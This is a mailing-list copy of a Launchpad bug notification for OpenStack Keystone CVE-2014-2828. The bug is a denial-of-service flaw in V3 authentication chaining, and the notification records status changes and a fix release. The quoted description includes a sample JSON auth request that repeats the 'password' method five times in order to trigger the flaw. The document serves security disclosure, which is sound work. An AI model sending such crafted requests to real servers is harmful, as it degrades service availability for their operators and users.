[Openstack-security] [Bug 1300274] Re: [0SSA 2014-013] V3 Authentication Chaining - uniqueness of auth method names (CVE-2014-2828)

Alan Pevec 1300274 at bugs.launchpad.net
Fri Apr 11 14:04:48 UTC 2014


** Changed in: keystone/havana
   Importance: Undecided => High

** Tags removed: havana-backport-potential

-- 
You received this bug notification because you are a member of OpenStack
Security Group, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1300274

Title:
  [0SSA 2014-013] V3 Authentication Chaining - uniqueness of auth method
  names (CVE-2014-2828)

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone havana series:
  Fix Committed
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  In V3.0 API,  we can chain authentication methods. An attacker can
  place the same authentication method multiple times in the methods
  filed. This will result in the same authentication method checking
  over and over (for loop in code).  Using this, an attacker can achieve
  some sorts of Denial of Service.   The methods field is not properly
  sanitized.

  {
     "auth":{
        "identity":{
           "methods":[
              "password",
              "password",
               "password",
               "password",
               "password" 
           ],
          "password":{
              "user":{
                 "domain":{
                    "id":"default"
                 },
                 "name":"demo",
                 "password":"stack"
              }
           }
        }
     }
  }

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1300274/+subscriptions




More information about the Openstack-security mailing list